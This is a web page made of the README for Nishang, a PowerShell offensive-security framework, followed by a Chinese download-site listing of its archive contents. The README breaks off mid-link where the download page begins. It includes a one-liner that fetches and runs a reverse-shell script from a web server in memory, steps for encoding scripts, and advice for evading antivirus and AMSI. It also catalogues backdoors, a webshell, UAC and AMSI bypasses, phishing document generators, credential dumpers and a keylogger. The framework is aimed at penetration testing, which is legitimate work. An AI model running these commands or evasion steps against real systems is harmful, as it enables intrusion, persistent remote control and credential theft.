# Nishang
### Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
By [nikhil_mitt](https://twitter.com/nikhil_mitt)
#### Usage
Import all the scripts in the current PowerShell session (PowerShell v3 onwards).
```powershell
PS C:\nishang> Import-Module .\nishang.psm1
```
Use the individual scripts with dot sourcing.
```powershell
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1
PS C:\nishang> Get-Information
```
To get help about any script or function, use:
```powershell
PS C:\nishang> Get-Help [scriptname] -full
```
Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.
For example, to see the help about Get-WLAN-Keys.ps1, use
```powershell
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1
PS C:\nishang> Get-Help Get-WLAN-Keys -Full
```
#### Anti Virus
Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
Method 1. Use the in-memory dowload and execute:
Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
```powershell
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]
```
Method 2. Use the `-encodedcommand` (or `-e`) parameter of PowerShell
All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) `"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]"`.
Encode the scrript using Invoke-Encode from Nishang:
```powershell
PS C:\nishang> . \nishang\Utility\Invoke-Encode
PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand
```
Encoded data written to .\encoded.txt
Encoded command written to .\encodedcommand.txt
From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:
```powershell
C:\Users\target> powershell -e [encodedscript]
```
If the scripts still get detected changing the function and parameter names and removing the help content will help.
In case Windows 10's AMSI is still blocking script execution, see this blog: http://www.labofapenetrationtester.com/2016/09/amsi.html
#### Scripts
Nishang currently contains the following scripts and payloads.
#### ActiveDirectory
[Set-DCShadowPermissions](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1)
Modify AD objects to provide minimal permissions required for DCShadow.
#### Antak - the Webshell
[Antak](https://github.com/samratashok/nishang/tree/master/Antak-WebShell)
Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.
#### Backdoors
[HTTP-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/HTTP-Backdoor.ps1)
A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
[DNS_TXT_Pwnage](https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1)
A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
[Execute-OnTime](https://github.com/samratashok/nishang/blob/master/Backdoors/Execute-OnTime.ps1)
A backdoor which can execute PowerShell scripts at a given time on a target.
[Gupt-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Gupt-Backdoor.ps1)
A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
[Add-ScrnSaveBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-ScrnSaveBackdoor.ps1)
A backdoor which can use Windows screen saver for remote command and script execution.
[Invoke-ADSBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1)
A backdoor which can use alternate data streams and Windows Registry to achieve persistence.
[Add-RegBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-RegBackdoor.ps1)
A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).
[Set-RemoteWMI](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)
Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.
[Set-RemotePSRemoting](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1)
Modify permissions of PowerShell remoting to allow access to a non-admin user.
#### Bypass
[Invoke-AmsiBypass](https://github.com/samratashok/nishang/blob/master/Bypass/Invoke-AmsiBypass.ps1)
Implementation of publicly known methods to bypass/avoid AMSI.
#### Client
[Out-CHM](https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1)
Create infected CHM files which can execute PowerShell commands and scripts.
[Out-Word](https://github.com/samratashok/nishang/blob/master/Client/Out-Word.ps1)
Create Word files and infect existing ones to run PowerShell commands and scripts.
[Out-Excel](https://github.com/samratashok/nishang/blob/master/Client/Out-Excel.ps1)
Create Excel files and infect existing ones to run PowerShell commands and scripts.
[Out-HTA](https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1)
Create a HTA file which can be deployed on a web server and used in phishing campaigns.
[Out-Java](https://github.com/samratashok/nishang/blob/master/Client/Out-Java.ps1)
Create signed JAR files which can be used with applets for script and command execution.
[Out-Shortcut](https://github.com/samratashok/nishang/blob/master/Client/Out-Shortcut.ps1)
Create shortcut files capable of executing PowerShell commands and scripts.
[Out-WebQuery](https://github.com/samratashok/nishang/blob/master/Client/Out-WebQuery.ps1)
Create IQY files for phishing credentials and SMB hashes.
[Out-JS](https://github.com/samratashok/nishang/blob/master/Client/Out-JS.ps1)
Create JS files capable of executing PowerShell commands and scripts.
[Out-SCT](https://github.com/samratashok/nishang/blob/master/Client/Out-SCT.ps1)
Create SCT files capable of executing PowerShell commands and scripts.
[Out-SCF](https://github.com/samratashok/nishang/blob/master/Client/Out-SCF.ps1)
Create a SCF file which can be used for capturing NTLM hash challenges.
#### Escalation
[Enable-DuplicateToken](https://github.com/samratashok/nishang/blob/master/Escalation/Enable-DuplicateToken.ps1)
When SYSTEM privileges are required.
[Remove-Update](https://github.com/samratashok/nishang/blob/master/Escalation/Remove-Update.ps1)
Introduce vulnerabilities by removing patches.
[Invoke-PsUACme](https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1)
Bypass UAC.
#### Execution
[Download-Execute-PS](https://github.com/samratashok/nishang/blob/master/Execution/Download-Execute-PS.ps1)
Download and execute a PowerShell script in memory.
[Download_Execute](https://github.com/samratashok/nishang/blob/master/Execution/Download_Execute.ps1)
Download an executable in text format, convert it to an executable, and execute.
[Execute-Command-MSSQL](https
没有合适的资源?快使用搜索试试~ 我知道了~
Nishang2022最新可用版本,稳定
共100个文件
ps1:87个
md:3个
psm1:2个
需积分: 22 1 下载量 155 浏览量
2022-06-28
19:56:42
上传
评论
收藏 2.31MB ZIP 举报
温馨提示
Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段 NiShang目录介绍 ActiveDirectory:活动目录 Antak-Webshell:在内存中执行PowerShell脚本,运行命令,并使用此Webshell下载和上传文件 Backdoors:一个后门,可以从第三方网站接收指令,并在内存中执行PowerShell脚本 Bypass:实施公告已知方法来绕过 Client:客户端 Escalationl:当需要权限时提取 Executionl:命令执行RCE Gatherl信息收集 MITE:用于MITM攻击的本地HTTOS代理 Misc:脚本 Piovt:跳板 Prasadhak:对照VirusTotal数据库检查正在进行的进程的运行哈希
资源详情
资源评论
资源推荐
收起资源包目录
Nishang2022最新可用版本,稳定 (100个子文件)
antak.aspx 10KB
.gitattributes 483B
.gitignore 3KB
LICENSE 1KB
README.md 17KB
Readme.md 1KB
README.md 1KB
Nishang_Logo.png 5KB
Nishang_logo_small.png 1KB
Invoke-Mimikatz.ps1 3.46MB
Run-EXEonRemote.ps1 1.28MB
Invoke-MimikatzWDigestDowngrade.ps1 666KB
Invoke-AmsiBypass.ps1 62KB
Invoke-PsUACme.ps1 50KB
Invoke-SessionGopher.ps1 41KB
Invoke-Interceptor.ps1 26KB
Invoke-ConPtyShell.ps1 24KB
Invoke-Mimikittenz.ps1 21KB
Out-CHM.ps1 19KB
Out-Excel.ps1 19KB
DNS_TXT_Pwnage.ps1 18KB
Out-Word.ps1 17KB
Get-PassHashes.ps1 17KB
Keylogger.ps1 14KB
Invoke-PowerShellWmi.ps1 14KB
HTTP-Backdoor.ps1 13KB
Invoke-BruteForce.ps1 13KB
Execute-OnTime.ps1 12KB
Invoke-PsGcat.ps1 11KB
Invoke-NetworkRelay.ps1 10KB
Invoke-PoshRatHttps.ps1 9KB
Get-LSASecret.ps1 9KB
Set-DCShadowPermissions.ps1 9KB
Set-RemoteWMI.ps1 8KB
Add-Exfiltration.ps1 7KB
Invoke-JSRatRundll.ps1 7KB
Out-Java.ps1 7KB
Check-VM.ps1 7KB
Parse_Keys.ps1 7KB
Add-Persistence.ps1 7KB
Invoke-PoshRatHttp.ps1 7KB
Execute-Command-MSSQL.ps1 6KB
Invoke-JSRatRegsvr.ps1 6KB
Invoke-PsGcatAgent.ps1 6KB
Start-CaptureServer.ps1 6KB
Gupt-Backdoor.ps1 6KB
Do-Exfiltration.ps1 6KB
Show-TargetScreen.ps1 6KB
Invoke-PowerShellUdp.ps1 6KB
Set-RemotePSRemoting.ps1 5KB
Enable-DuplicateToken.ps1 5KB
Invoke-SSIDExfil.ps1 5KB
Out-HTA.ps1 5KB
Add-ScrnSaveBackdoor.ps1 5KB
Add-ConstrainedDelegationBackdoor.ps1 5KB
Add-ConstrainedDelegationBackdoor.ps1 5KB
Invoke-Encode.ps1 5KB
Execute-DNSTXT-Code.ps1 5KB
Invoke-PortScan.ps1 4KB
Invoke-ADSBackdoor.ps1 4KB
Invoke-PowerShellTcp.ps1 4KB
Out-Shortcut.ps1 4KB
Invoke-PowerShellIcmp.ps1 4KB
Out-DnsTxt.ps1 4KB
Out-RundllCommand.ps1 4KB
Invoke-Prasadhak.ps1 4KB
Get-Information.ps1 4KB
Out-SCT.ps1 3KB
Create-MultipleSessions.ps1 3KB
Out-WebQuery.ps1 3KB
Remove-Persistence.ps1 3KB
Out-JS.ps1 3KB
FireListener.ps1 3KB
Get-PassHints.ps1 2KB
Copy-VSS.ps1 2KB
Remove-Update.ps1 2KB
FireBuster.ps1 2KB
Download-Execute-PS.ps1 2KB
Invoke-Decode.ps1 2KB
Download_Execute.ps1 2KB
Add-RegBackdoor.ps1 2KB
Out-SCF.ps1 2KB
Invoke-CredentialsPhish.ps1 2KB
Base64ToString.ps1 1KB
StringToBase64.ps1 1KB
ConvertTo-ROT13.ps1 1KB
Remove-PoshRat.ps1 1023B
Invoke-PowerShellTcpOneLine.ps1 983B
TexttoExe.ps1 931B
ExetoText.ps1 926B
Get-WebCredentials.ps1 825B
Download.ps1 806B
Invoke-PowerShellUdpOneLine.ps1 713B
Invoke-PowerShellTcpOneLineBind.ps1 665B
Get-WLAN-Keys.ps1 658B
Speak.ps1 532B
Powerpreter.psm1 285KB
nishang.psm1 929B
CHANGELOG.txt 11KB
DISCLAIMER.txt 94B
共 100 条
- 1
夏初春末_昊
- 粉丝: 2820
- 资源: 53
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0